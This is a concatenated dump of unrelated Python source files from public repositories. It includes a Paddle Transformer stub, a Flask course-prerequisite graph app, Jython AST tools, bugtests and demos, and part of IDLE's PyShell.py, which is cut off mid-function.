from paddle.nn import Transformer
# src: [batch_size, tgt_len, d_model]
enc_input = paddle.rand((2, 4, 128))
# tgt: [batch_size, src_len, d_model]
dec_input = paddle.rand((2, 6, 128))
# src_mask: [batch_size, n_head, src_len, src_len]
enc_self_attn_mask = paddle.rand((2, 2, 4, 4))
# tgt_mask: [batch_size, n_head, tgt_len, tgt_len]
dec_self_attn_mask = paddle.rand((2, 2, 6, 6))
# memory_mask: [batch_size, n_head, tgt_len, src_len]
cross_attn_mask = paddle.rand((2, 2, 6, 4))
transformer = Transformer(128, 2, 4, 4, 512)
output = transformer(enc_input,
dec_input,
enc_self_attn_mask,
dec_self_attn_mask,
cross_attn_mask) # [2, 6, 128]
"""
def __init__(self,
d_model=512,
nhead=8,
num_encoder_layers=6,
num_decoder_layers=6,
dim_feedforward=2048,
dropout=0.1,
activation="relu",
attn_dropout=None,
act_dropout=None,
normalize_before=False,
weight_attr=None,
bias_attr=None,
custom_encoder=None,
custom_decoder=None):
super(fusedTransformer, self).__init__()
raise NotImplementedError()
def forward(self, src, tgt, src_mask=None, tgt_mask=None, memory_mask=None):
raise NotImplementedError()
```
|
{
"source": "jeff4elee/course_path",
"score": 3
}
|
#### File: course_path/home/dag_analyzer.py
```python
from catalog_scraper import extract_catalog_dict, write_catalog, read_catalog
import json
import networkx as nx
from networkx.readwrite import json_graph
import os.path
if(os.path.isfile('courses.csv')):
course_catalog = read_catalog('courses.csv')
else:
course_ids, course_titles, course_pre = extract_catalog_dict(record=True)
write_catalog(course_ids, course_titles, course_pre, record=True)
course_catalog = read_catalog('courses.csv')
courses = {}
"""
ids, titles, pres = extract_catalog_dict(record=False)
catalog_info = zip(ids, titles, pres)
course_catalog = {}
for x, y, z in catalog_info:
course_catalog[x.lower().replace(" ", "")] = (x, y, z)
print course_catalog
"""
def insert_into_course(key, value):
if not type(value) is dict:
raise TypeError("Value is not a dictionary!")
if key not in courses:
courses[key] = value
else:
courses[key].update(value)
def dfs(course_info):
"""
dfs(course_info)
course_info -> 3-tuple in the format (string, string, list of strings)
updates the courses dictionary to include the specified course and its prereqs
"""
#gets the id of the course
i = course_info[0]
#check if the courses dict already has the course path defined
if i in courses:
return {i: courses[i]}
#retrieve the list of preqres for the course
pr = [p for p in course_info[2]]
# memoization table, check if keys in dict already exists
for p in course_info[2]:
if(isinstance(p, list)):
insert_into_course(i, {" or ".join(p): p})
pr.remove(p)
elif p in courses:
insert_into_course(i, {p: courses[p]})
pr.remove(p)
# check if there are no prereqs (empty list)
if not course_info[2]:
courses[i] = i
return {i : i}
#stack consisting of the prerequisites
course_stack = [pr]
#stack or dfs to reproduce a DAG
while(course_stack):
curr_p = course_stack.pop()
#iterate through the id of each prereq in the list
for curr_i in curr_p:
#check if the id is in the courses dict or the course_catalog dict
#courses keys are fromatted like 'CSE 100'
#course_catalog keys are formatted like 'CSE100' <-- notice no space
if curr_i not in courses and curr_i.upper().replace(" ", "") in course_catalog:
#retrieve the course_info from the catalog with the matching id
c_info = course_catalog[curr_i.upper().replace(" ", "")]
#retrieve prereq dictionary of current prereq
prereqs = dfs(c_info)
#merge the prereq dictionary to the courses's current prereq dict
insert_into_course(i, prereqs)
#memoization in action
elif curr_i in courses:
insert_into_course(i, {curr_i: courses[curr_i]})
#edge case, courses catalog doesn't contain the prereq
elif curr_i.upper().replace(" ", "") not in course_catalog:
insert_into_course(i, {curr_i : curr_i})
return {i: courses[i]}
def determine_path(course):
course_path = dfs(course)
path = "Root: " + course[0] + ' - ' + course[1]
#print_path(course_path[course[0]], 4)
return calculate_path(course_path[course[0]], 3, path)
def print_path(dict_path, spaces, str_format=None):
if not str_format:
str_format = "Child:"
if type(dict_path) is str:
return
if type(dict_path) is list:
for item in dict_path:
try:
course = course_catalog[item.upper().replace(" ", "")]
print_path(dfs(course), spaces+3, "Or Root:")
except:
continue
else:
for key in dict_path.iterkeys():
print " "*spaces + str_format, key
print_path(dict_path[key], spaces+3)
def calculate_path(dict_path, spaces, path, str_format=None):
"""
calculate_path(dict_path, spaces, path, str_format=None)
dict_path --> dictionary of the course and its prerequisites
spaces --> spacing of the format
path --> initial string to set before the path display
str_format --> for the children!
returns a string representation (used for html) of the specified
dictionary path (a course and its prerequisites)
"""
if not str_format:
str_format = "Child:"
#str indicates no further path, so return the path as is
if type(dict_path) is str:
return path
#list indicates 'or prerequisites'
#parse and calculate each individual path with a special format
if type(dict_path) is list:
for item in dict_path:
try:
course = course_catalog[item.upper().replace(" ", "")]
path += calculate_path(dfs(course), spaces, " ", "Or Root:")
except:
continue
#regular dictionary path, continue recursively (dfs)
else:
for key in dict_path.iterkeys():
path += "<br>" + " "*spaces + str_format + " " + key
path += calculate_path(dict_path[key], spaces+3, " ")
return path
def generate_graph(course):
G = nx.DiGraph()
course_path = dfs(course)
# path = "Root: " + course[0] + ' - ' + course[1]
G.add_node(course[0], name=course[0], group="Root Course")
def generate_path(G, parent, dict_path):
if type(dict_path) is str:
return
if type(dict_path) is list:
for item in dict_path:
try:
G.add_node(item, name=item, group="Or Courses")
G.add_edge(parent, item)
course = course_catalog[item.upper().replace(" ", "")]
generate_path(G, item, dfs(course))
except:
continue
else:
# G.add_edges_from([(parent, key) for key in dict_path.iterkeys()])
for key in dict_path.iterkeys():
G.add_node(key, name=key)
G.add_edge(parent, key)
generate_path(G, key, dict_path[key])
#print_path(course_path[course[0]], 4)
generate_path(G, course[0], course_path[course[0]])
d = json_graph.node_link_data(G) # node-link format to serialize
json.dump(d, open('home/static/force.json','w'))
```
#### File: course_path/home/views.py
```python
from home import app
from catalog_scraper import read_catalog
from flask import render_template, flash, redirect, session, url_for, request, g
from .forms import CourseForm
from dag_analyzer import generate_graph, course_catalog
@app.route('/', methods=['POST', 'GET'])
@app.route('/index', methods=['POST', 'GET'])
def index():
form = CourseForm()
if form.validate_on_submit():
response = request.form.get('course')
course_id = response.upper().replace(" ", "")
path = generate_graph(course_catalog[course_id])
return render_template('index.html',
form=form,
read=True)
return render_template('index.html',
form=form)
```
|
{
"source": "jeff5/jython-whinchat",
"score": 3
}
|
#### File: jython-whinchat/ast/astdump.py
```python
import os
import globwalk
import astview
def makepath(path):
"""
from <EMAIL> 2002/03/18
See: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/117243
"""
from os import makedirs
from os.path import normpath,dirname,exists,abspath
dpath = normpath(dirname(path))
if not exists(dpath): makedirs(dpath)
return normpath(abspath(path))
def main(code_path, output_dir, testfile=False):
if os.path.exists(output_dir):
print "%s already exists, exiting" % output_dir
sys.exit(1)
os.mkdir(output_dir)
if testfile:
pyfiles = [f.rstrip() for f in file(code_path)]
elif os.path.isdir(code_path):
pyfiles = globwalk.GlobDirectoryWalker(code_path, "*.py")
else:
pyfiles = [code_path]
for pyfile in pyfiles:
import pprint
path = pyfile.split(os.path.sep)
print "%s to %s: %s" % (pyfile, output_dir, os.path.join(output_dir, *path))
fh = open(makepath(os.path.join(output_dir, *path)), 'w')
print fh
pprint.pprint(astview.tree(pyfile), fh)
if __name__ == '__main__':
import sys
import getopt
usage = """\
Usage: python %s [-t] code_path output_dir
output_dir must not exist (it will be created)
unless -t is specified, if codepath is a file test it, if codepath is a directory
test all .py files in and below that directory.
""" % sys.argv[0]
testfile = False
try:
opts, args = getopt.getopt(sys.argv[1:], 'th')
except:
print usage
sys.exit(1)
for o, v in opts:
if o == '-h':
print usage
sys.exit(0)
if o == '-t':
testfile = True
if len(args) < 2 or len(args) > 3:
print usage
sys.exit(1)
main(args[0], args[1], testfile)
```
#### File: jython-whinchat/ast/astlib2.py
```python
import _ast
import os
import globwalk
def lispify_ast(node):
return tuple(lispify_ast2(node))
def lispify_ast2(node):
yield node.__class__.__name__
try:
for field in node._fields:
yield tuple(lispify_field(field, getattr(node, field)))
except:
pass
def lispify_field(field, child):
yield field
if not isinstance(child, list):
children = [child]
else:
children = child
for node in children:
if isinstance(node, _ast.AST):
yield lispify_ast(node)
else:
if isinstance(node, float):
#stringify floats so they match Java's float representation better
yield str(node)
else:
yield node
if __name__ == '__main__':
import sys
from pprint import pprint
code_path = sys.argv[1]
ast = compile(open(code_path).read(), code_path, "exec", _ast.PyCF_ONLY_AST)
lispified = lispify_ast(ast)
pprint(lispified)
```
#### File: jython-whinchat/ast/globwalk.py
```python
import os
import fnmatch
class GlobDirectoryWalker:
# a forward iterator that traverses a directory tree
def __init__(self, directory, pattern="*"):
self.stack = [directory]
self.pattern = pattern
self.files = []
self.index = 0
def __getitem__(self, index):
while 1:
try:
file = self.files[self.index]
self.index = self.index + 1
except IndexError:
# pop next directory from stack
self.directory = self.stack.pop()
self.files = os.listdir(self.directory)
self.index = 0
else:
# got a filename
fullname = os.path.join(self.directory, file)
if os.path.isdir(fullname) and not os.path.islink(fullname):
self.stack.append(fullname)
if fnmatch.fnmatch(file, self.pattern):
return fullname
#for file in GlobDirectoryWalker(".", "*.py"):
# print file
```
#### File: jython-whinchat/bugtests/test338m.py
```python
class test338m(test338j1):
def getDescription(self):
desc = test338j1.getDescription(self) # Superclass call
return "Foo_" + desc
```
#### File: jython-whinchat/bugtests/test349.py
```python
import support
import java, time, sys, cStringIO
class A:
def __del__(self):
raise KeyError, "dummy"
try:
sys.stderr = cStringIO.StringIO()
A()
java.lang.System.gc()
time.sleep(2)
finally:
v = sys.stderr.getvalue()
sys.stderr = sys.__stderr__
support.compare(v, "Exception KeyError: .* ignored")
```
#### File: jython-whinchat/bugtests/test368.py
```python
import support
from java.io import *
from org.python.util import *
SINGL= None
#SINGL= Ellipsis
class Test(Serializable):
def __init__(self):
self.attr = SINGL
def test(self):
if self.attr is not SINGL:
raise support.TestError("Singleton not unique")
if self.attr != SINGL:
raise support.TestError("Singleton not unique")
def load(path):
file = File(path)
fileIn = FileInputStream(file)
pyIn = PythonObjectInputStream(fileIn)
pyObj = pyIn.readObject()
pyIn.close()
return pyObj
def save(obj, path):
fileOut = FileOutputStream(path)
objOut = ObjectOutputStream(fileOut)
objOut.writeObject(obj)
objOut.flush()
objOut.close()
#print "Testing initial object..."
a = Test()
a.test()
save(a, "test368.out")
b = load("test368.out")
#print "Testing deserialized object..."
b.test()
```
#### File: jython-whinchat/bugtests/test380.py
```python
import support
d = {}
import java
clash_id = java.lang.System.identityHashCode
for i in xrange(100000):
s = ['test',i]
j = clash_id(s)
if d.has_key(j):
break
d[j] = s
s1 = s
s0 = d[j]
data = [s0,s1,s0]
#print data
import pickle
import cPickle
def check(ctxt,data0,data1):
if data0 != data1:
raise support.TestError,"data corrupted in %s because of id clashes: %s != %s" % (ctxt.__name__,data0,data1)
def pik_test(pikmod,data):
pik =pikmod.dumps(data,1)
data1 = pikmod.loads(pik)
check(pikmod,data,data1)
pik_test(cPickle,data)
pik_test(pickle,data)
import copy
check(copy.deepcopy,data,copy.deepcopy(data))
```
#### File: jython-whinchat/bugtests/test382.py
```python
import sys
def check(tb,expt_lines):
assert tb.tb_frame is sys._getframe(1),"catching frame should be included"
lines=[]
while tb:
lines.append(tb.tb_lineno)
tb = tb.tb_next
assert expt_lines==lines, "bogus line numbers: %s vs. expected %s" % (lines,expt_lines)
def f():
try:
raise KeyError # 17
except:
raise
try:
f() # 22
except:
t,e,tb = sys.exc_info()
check(tb,[22,17])
try:
f() # 28
except KeyError,e:
t,e,tb = sys.exc_info()
check(tb,[28,17])
try:
1/0 # 34
except:
t,e,tb = sys.exc_info()
check(tb,[34])
try:
try:
1/0 # 41
except:
raise
except:
t,e,tb = sys.exc_info()
check(tb,[41])
```
#### File: applet/deprecated/ChoiceDemo.py
```python
from java import awt, applet
class ChoiceDemo(applet.Applet):
def init(self):
self.choices = awt.Choice(itemStateChanged=self.change)
for item in ['ichi', 'ni', 'san', 'yon']:
self.choices.addItem(item)
self.label = awt.Label()
self.change()
self.add(self.choices)
self.add(self.label)
def change(self, event=None):
selection = self.choices.selectedIndex, self.choices.selectedItem
self.label.text = 'Item #%d selected. Text = "%s".' % selection
if __name__ == '__main__':
import pawt
pawt.test(ChoiceDemo())
```
#### File: Demo/bean/TempConverter.py
```python
import java
class TempConverter(java.lang.Object):
def __init__(self):
self.setFahrenheit(0.0)
def setFahrenheit(self, degrees):
"@sig public void setFahrenheit(double degrees)"
self.f = degrees
self.c = (degrees-32.)/1.8
def getFahrenheit(self):
"@sig public double getFahrenheit()"
return self.f
def setCelsius(self, degrees):
"@sig public void setCelsius(double degrees)"
self.c = degrees
self.f = degrees*1.8+32.
def getCelsius(self):
"@sig public double getCelsius()"
return self.c
def __repr__(self):
return '<%.2g degrees fahrenheit == %.2g celsius>' % (self.f, self.c)
if __name__ == '__main__':
c = TempConverter()
print c
c.setCelsius(100)
print c
c.setCelsius(0)
print c
c.setFahrenheit(212)
print c
```
#### File: 2.7/idlelib/PyShell.py
```python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import io
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import idlever
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
IDENTCHARS = string.ascii_letters + string.digits + "_"
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno,
file=None, line=None):
if file is None:
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename,
lineno, line=line))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath,"r") as old_file:
lines = old_file.readlines()
except IOError:
lines = []
try:
with open(self.breakpointPath,"w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except IOError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
from idlelib import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
